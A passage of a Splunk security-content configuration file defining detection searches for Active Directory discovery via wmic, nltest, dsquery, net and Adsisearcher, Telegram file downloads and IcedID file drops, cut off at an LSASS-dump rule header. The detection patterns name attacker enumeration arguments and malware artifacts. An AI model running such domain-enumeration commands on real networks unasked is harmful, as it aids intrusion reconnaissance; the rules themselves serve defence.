`Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-24 action.escu.modification_date = 2021-08-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Account Discovery with Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = an instance of process $process_name$ with commandline $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Account Discovery with Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain users. Red Teams and adversaries alike use wmic.exe to enumerate domain users for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Domain Account Discovery with Wmic action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="wmic.exe" AND Processes.process = "*/NAMESPACE:\\\\root\\directory\\ldap*" AND Processes.process = "*ds_user*" AND Processes.process = "*GET*" AND Processes.process = "*ds_samaccountname*" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_account_discovery_with_wmic_filter` [ESCU - Domain Controller Discovery with Nltest - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `nltest.exe` with command-line arguments utilized to discover remote systems. The arguments `/dclist:` and '/dsgetdc:', can be used to return a list of all domain controllers. Red Teams and adversaries alike may use nltest.exe to identify domain controllers in a Windows Domain for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `nltest.exe` with command-line arguments utilized to discover remote systems. The arguments `/dclist:` and '/dsgetdc:', can be used to return a list of all domain controllers. Red Teams and adversaries alike may use nltest.exe to identify domain controllers in a Windows Domain for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Controller Discovery with Nltest - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "CISA AA23-347A", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Domain controller discovery on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 21}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Controller Discovery with Nltest - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "CISA AA23-347A", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `nltest.exe` with command-line arguments utilized to discover remote systems. The arguments `/dclist:` and '/dsgetdc:', can be used to return a list of all domain controllers. Red Teams and adversaries alike may use nltest.exe to identify domain controllers in a Windows Domain for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Domain Controller Discovery with Nltest action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="nltest.exe") (Processes.process="*/dclist:*" OR Processes.process="*/dsgetdc:*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_controller_discovery_with_nltest_filter` [ESCU - Domain Controller Discovery with Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command line return a list of all domain controllers in a Windows domain. Red Teams and adversaries alike use *.exe to identify remote systems for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to discover remote systems. The arguments utilized in this command line return a list of all domain controllers in a Windows domain. Red Teams and adversaries alike use *.exe to identify remote systems for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Controller Discovery with Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Controller Discovery with Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 70, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1018"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process="" OR Processes.process="*DomainControllerAddress*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_controller_discovery_with_wmic_filter` [ESCU - Domain Group Discovery with Adsisearcher - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use Adsisearcher for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery with Adsisearcher - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = Domain group discovery enumeration using PowerShell on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery with Adsisearcher - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery. action.notable.param.rule_title = Domain Group Discovery with Adsisearcher action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (Message = "*[adsisearcher]*" AND Message = "*(objectcategory=group)*" AND Message = "*findAll()*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | rename ComputerName as dest |rename User as user | `security_content_ctime(firstTime)` | `domain_group_discovery_with_adsisearcher_filter` [ESCU - Domain Group Discovery With Dsquery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to query for domain groups. The argument `group`, returns a list of all domain groups. Red Teams and adversaries alike use may leverage dsquery.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `dsquery.exe` with command-line arguments utilized to query for domain groups. The argument `group`, returns a list of all domain groups. Red Teams and adversaries alike use may leverage dsquery.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery With Dsquery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery With Dsquery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe") (Processes.process="*group*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_group_discovery_with_dsquery_filter` [ESCU - Domain Group Discovery With Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` with command-line arguments utilized to query for domain groups. The argument `group /domain`, returns a list of all domain groups. Red Teams and adversaries alike use net.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` with command-line arguments utilized to query for domain groups. The argument `group /domain`, returns a list of all domain groups. Red Teams and adversaries alike use net.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery With Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Post-Exploitation", "Active Directory Discovery", "Prestige Ransomware", "Graceful Wipe Out Attack", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery With Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Post-Exploitation", "Active Directory Discovery", "Prestige Ransomware", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") (Processes.process=*group* AND Processes.process=*/do*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_group_discovery_with_net_filter` [ESCU - Domain Group Discovery With Wmic - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain groups. The arguments utilized in this command return a list of all domain groups. Red Teams and adversaries alike use wmic.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `wmic.exe` with command-line arguments utilized to query for domain groups. The arguments utilized in this command return a list of all domain groups. Red Teams and adversaries alike use wmic.exe to enumerate domain groups for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-08-25 action.escu.modification_date = 2021-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Domain Group Discovery With Wmic - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Domain Group Discovery With Wmic - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe") (Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_group* AND Processes.process="*GET ds_samaccountname*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `domain_group_discovery_with_wmic_filter` [ESCU - Download Files Using Telegram - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic will identify a suspicious download by the Telegram application on a Windows system. This behavior was identified on a honeypot where the adversary gained access, installed Telegram and followed through with downloading different network scanners (port, bruteforcer, masscan) to the system and later used to mapped the whole network and further move laterally. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic will identify a suspicious download by the Telegram application on a Windows system. This behavior was identified on a honeypot where the adversary gained access, installed Telegram and followed through with downloading different network scanners (port, bruteforcer, masscan) to the system and later used to mapped the whole network and further move laterally. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and TargetFilename from your endpoints or Events that monitor filestream events which is happened when process download something. (EventCode 15) If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = normal download of file in telegram app. (if it was a common app in network) action.escu.creation_date = 2021-05-06 action.escu.modification_date = 2021-05-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Download Files Using Telegram - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["XMRig", "Phemedrone Stealer", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = Suspicious files were downloaded with the Telegram application on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Download Files Using Telegram - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic will identify a suspicious download by the Telegram application on a Windows system. This behavior was identified on a honeypot where the adversary gained access, installed Telegram and followed through with downloading different network scanners (port, bruteforcer, masscan) to the system and later used to mapped the whole network and further move laterally. action.notable.param.rule_title = Download Files Using Telegram action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode= 15 process_name = "telegram.exe" TargetFilename = "*:Zone.Identifier" |stats count min(_time) as firstTime max(_time) as lastTime by dest EventCode process_name process_id TargetFilename Hash | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `download_files_using_telegram_filter` [ESCU - Drop IcedID License dat - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect dropping a suspicious file named as "license.dat" in %appdata%. This behavior seen in latest IcedID malware that contain the actual core bot that will be injected in other process to do banking stealing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect dropping a suspicious file named as "license.dat" in %appdata%. This behavior seen in latest IcedID malware that contain the actual core bot that will be injected in other process to do banking stealing. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-30 action.escu.modification_date = 2021-07-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Drop IcedID License dat - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Drop IcedID License dat - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode= 11 TargetFilename = "*\\license.dat" AND (TargetFilename="*\\appdata\\*" OR TargetFilename="*\\programdata\\*") |stats count min(_time) as firstTime max(_time) as lastTime by TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_icedid_license_dat_filter` [ESCU - DSQuery Domain Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies "dsquery.exe" execution with arguments looking for `TrustedDomain` query directly on the command-line. This is typically indicative of an Administrator or adversary perform domain trust discovery. Note that this query does not identify any other variations of "Dsquery.exe" usage.\ Within this detection, it is assumed `dsquery.exe` is not moved or renamed.\ The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "dsquery.exe" and its parent process.\ DSQuery.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64` and only on Server operating system.\ The following DLL(s) are loaded when DSQuery.exe is launched `dsquery.dll`. If found loaded by another process, it is possible dsquery is running within that process context in memory.\ In addition to trust discovery, review parallel processes for additional behaviors performed. Identify the parent process and capture any files (batch files, for example) being used. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies "dsquery.exe" execution with arguments looking for `TrustedDomain` query directly on the command-line. This is typically indicative of an Administrator or adversary perform domain trust discovery. Note that this query does not identify any other variations of "Dsquery.exe" usage.\ Within this detection, it is assumed `dsquery.exe` is not moved or renamed.\ The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "dsquery.exe" and its parent process.\ DSQuery.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64` and only on Server operating system.\ The following DLL(s) are loaded when DSQuery.exe is launched `dsquery.dll`. If found loaded by another process, it is possible dsquery is running within that process context in memory.\ In addition to trust discovery, review parallel processes for additional behaviors performed. Identify the parent process and capture any files (batch files, for example) being used. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives. If there is a true false positive, filter based on command-line or parent process. action.escu.creation_date = 2021-03-31 action.escu.modification_date = 2021-03-31 action.escu.confidence = high action.escu.full_search_name = ESCU - DSQuery Domain Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Domain Trust Discovery", "Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified performing domain discovery on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - DSQuery Domain Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Domain Trust Discovery", "Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies "dsquery.exe" execution with arguments looking for `TrustedDomain` query directly on the command-line. This is typically indicative of an Administrator or adversary perform domain trust discovery. Note that this query does not identify any other variations of "Dsquery.exe" usage.\ Within this detection, it is assumed `dsquery.exe` is not moved or renamed.\ The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "dsquery.exe" and its parent process.\ DSQuery.exe is natively found in `C:\Windows\system32` and `C:\Windows\syswow64` and only on Server operating system.\ The following DLL(s) are loaded when DSQuery.exe is launched `dsquery.dll`. If found loaded by another process, it is possible dsquery is running within that process context in memory.\ In addition to trust discovery, review parallel processes for additional behaviors performed. Identify the parent process and capture any files (batch files, for example) being used. action.notable.param.rule_title = DSQuery Domain Discovery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dsquery.exe Processes.process=*trustedDomain* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dsquery_domain_discovery_filter` [ESCU - Dump LSASS via comsvcs DLL - Rule] action.escu = 0 